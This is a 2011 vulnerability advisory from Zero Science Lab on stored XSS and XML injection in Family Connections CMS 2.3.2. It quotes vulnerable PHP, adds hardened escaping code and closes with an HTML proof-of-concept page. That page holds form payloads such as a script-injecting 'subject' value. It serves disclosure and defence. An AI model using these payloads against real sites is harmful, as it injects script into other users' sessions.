Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection

2011-03-25T00:00:00
ID ZSL-2011-5004
Type zeroscience
Reporter Gjoko Krstic
Modified 2011-03-25T00:00:00

Description

Title: Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection
Advisory ID: ZSL-2011-5004
Type: Remote
Impact: Cross-Site Scripting, System Access, Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data
Risk: (3/5)
Release Date: 25.03.2011

Summary

Family Connections is an open source content management system. It makes creating a private, family website easy and fun.

Description

FCMS suffers from a stored XSS vulnerability (post-authentication) in the messageboard.php script through the 'subject' POST parameter. The XML injection lies in the /inc/getChat.php script, reachable via the 'users' GET parameter with no arguments and the 'message' POST parameter.

--------------------------------------------------------------------------------

/inc/getChat.php (excerpt; lines 30-33, 46-51 and 107 of the file as numbered in the advisory):

```php
// New Chat text
if (isset($_POST['message']) && $_POST['message'] != '') {
    $sql = "INSERT INTO fcms_chat_messages(chat_id, user_id, user_name, message, post_time)
            VALUES (1, " . cleanInput($_POST['user_id']) . ", '" . cleanInput($_POST['name']) . "', '" . cleanInput($_POST['message']) . "', NOW())";
// ...
//Create the XML response.
$xml = '<?xml version="1.0" ?><root>';
// Get Users Online
if (isset($_GET['users']))
    // Timezone stuff
    $sql = "SELECT timezone FROM fcms_user_settings WHERE user = ".cleanInput($_GET['user_id']);
// ...
$xml .= '<text>' . htmlspecialchars($message_array['message']) . '</text>';
```
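As an added example (not code from the advisory or from the FCMS project), the following PHP shows hardened counterparts of the two output paths the advisory describes: the 'subject' value that messageboard.php echoes back, and the XML response that /inc/getChat.php assembles by string concatenation. Function names, the sample messages and the PHP 7.1+ syntax (dom and mbstring extensions) are assumptions; FCMS's own cleanInput() is not used.

```php
<?php
// Added example, not code from the FCMS project: hardened counterparts of the
// two output paths the advisory names. Function names are assumptions; the
// code targets PHP 7.1+ with the dom and mbstring extensions.

// --- Stored XSS via the 'subject' POST parameter (messageboard.php) ---------
// The PoC payload starts with "> to close a double-quoted attribute, so the
// encoder must escape quotes as well as <, > and & (ENT_QUOTES), and must not
// silently return '' on malformed UTF-8 (ENT_SUBSTITUTE).
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderSubjectField(string $subject): string
{
    return '<input type="text" name="subject" value="' . escapeHtml($subject) . '">';
}

// --- XML response of /inc/getChat.php ----------------------------------------
// Characters XML 1.0 cannot carry (most C0 controls) break the document even
// when escaped, so they are removed after invalid UTF-8 has been replaced.
function stripXmlIllegal(string $s): string
{
    $s = mb_convert_encoding($s, 'UTF-8', 'UTF-8');   // invalid bytes become '?'
    return (string) preg_replace(
        '/[^\x{9}\x{A}\x{D}\x{20}-\x{D7FF}\x{E000}-\x{FFFD}\x{10000}-\x{10FFFF}]/u',
        '',
        $s
    );
}

// Build the response with DOMDocument instead of string concatenation: every
// value goes in as a text node, so '<', '&' and quotes are always encoded and
// a message cannot open or close elements of its own.
function buildChatXml(array $messages, ?int $timezone = null): string
{
    $doc  = new DOMDocument('1.0', 'UTF-8');
    $root = $doc->appendChild($doc->createElement('root'));
    if ($timezone !== null) {
        $root->appendChild($doc->createElement('timezone'))
             ->appendChild($doc->createTextNode((string) $timezone));
    }
    foreach ($messages as $m) {
        $msg = $root->appendChild($doc->createElement('message'));
        foreach (['user_name' => 'user', 'message' => 'text'] as $column => $tag) {
            $msg->appendChild($doc->createElement($tag))
                ->appendChild($doc->createTextNode(stripXmlIllegal((string) ($m[$column] ?? ''))));
        }
    }
    return (string) $doc->saveXML();
}

// The advisory reaches the 'users' branch without the parameters it expects.
// Validate the id before it reaches SQL or the response, and answer with a
// well-formed XML error instead of whatever the database layer prints.
function requiredIntParam(array $params, string $name): ?int
{
    $raw = $params[$name] ?? null;
    return (is_string($raw) || is_int($raw)) && ctype_digit((string) $raw) ? (int) $raw : null;
}

function xmlError(string $reason): string
{
    $doc = new DOMDocument('1.0', 'UTF-8');
    $doc->appendChild($doc->createElement('root'))
        ->appendChild($doc->createElement('error'))
        ->appendChild($doc->createTextNode($reason));
    return (string) $doc->saveXML();
}

// Constructed sample input: the PoC strings plus a control character.
$sample = [
    ['user_name' => 'alice',    'message' => "\\';--\\\";--"],
    ['user_name' => "bob\"><b>", 'message' => "<text>injected</text>\x01"],
];

echo renderSubjectField('"><script>alert(1)</script>'), "\n";
echo requiredIntParam($_GET, 'user_id') === null
    ? xmlError('user_id must be an integer')
    : buildChatXml($sample, 1);
```

Run from the command line the script prints the escaped subject field followed by the XML error document (no user_id is present in $_GET); with `user_id=1` in the query string it prints the chat document, in which the second sample message appears as escaped text rather than as a nested `<text>` element.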
--------------------------------------------------------------------------------

Vendor

Ryan Haudenschilt - <http://www.familycms.com>

Affected Version

2.3.2

Tested On

Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41

Vendor Status

N/A

PoC

fccms_xml.html

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>
High five to Michael Brooks

References

[1] <http://packetstormsecurity.org/files/99734>
[2] <http://www.securityfocus.com/bid/47037>
[3] <http://www.securityfocus.com/bid/47038>
[4] <http://www.exploit-db.com/exploits/17050/>
[5] <http://securityreason.com/wlb_show/WLB-2011030110>
[6] <http://securityreason.com/exploitalert/10206>
[7] <http://secunia.com/advisories/39760/>

Changelog

[25.03.2011] - Initial release
[26.03.2011] - Added reference [2], [3] and [4]
[28.03.2011] - Added reference [5] and [6]
[30.03.2011] - Changed title, PoC file and Credits
[02.04.2011] - Added reference [7]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

PoC file (fccms_xml.html):

```html
<!--

Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection

Vendor: Ryan Haudenschilt
Product web page: http://www.familycms.com
Affected version: 2.3.2

Summary: Family Connections is an open source
content management system. It makes creating a
private, family website easy and fun.

Desc: FCMS suffers from a stored XSS vulnerability
(post-auth) in messageboard.php script thru the
'subject' post parameter. XML Inj. lies in the
/inc/getChat.php script with 'users' get parameter with
no args, and post parameter 'message'.

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.14 (Win32)
           PHP 5.3.1
           MySQL 5.1.41

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com
                            Zero Science Lab - http://www.zeroscience.mk

Advisory ID: ZSL-2011-5004
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5004.php

22.03.2011

-->

<html>
<title>Family Connections CMS 2.3.2 Stored XSS And XML Injection</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xml(){document.forms["xml"].submit();}
function xss(){document.forms["xss"].submit();}
</script>
<form action="http://FCMS/inc/getChat.php" enctype="application/x-www-form-urlencoded" method="POST" id="xml">
<input type="hidden" name="message" value="\\';--\\&#34;;--" /></form>
<a href="javascript: xml();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit XML Injection!</h3></center></font></b></a>
<form action="http://FCMS/messageboard.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
<input type="hidden" name="subject" value='"><script>alert(1)</script>' />
<input type="hidden" name="post" value="waddup" />
<input type="hidden" name="name" value="1" />
<input type="hidden" name="post_submit" value="Submit" /></form>
<a href="javascript: xss();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit XSS!</h3></center></font></b></a>
</body></html>
```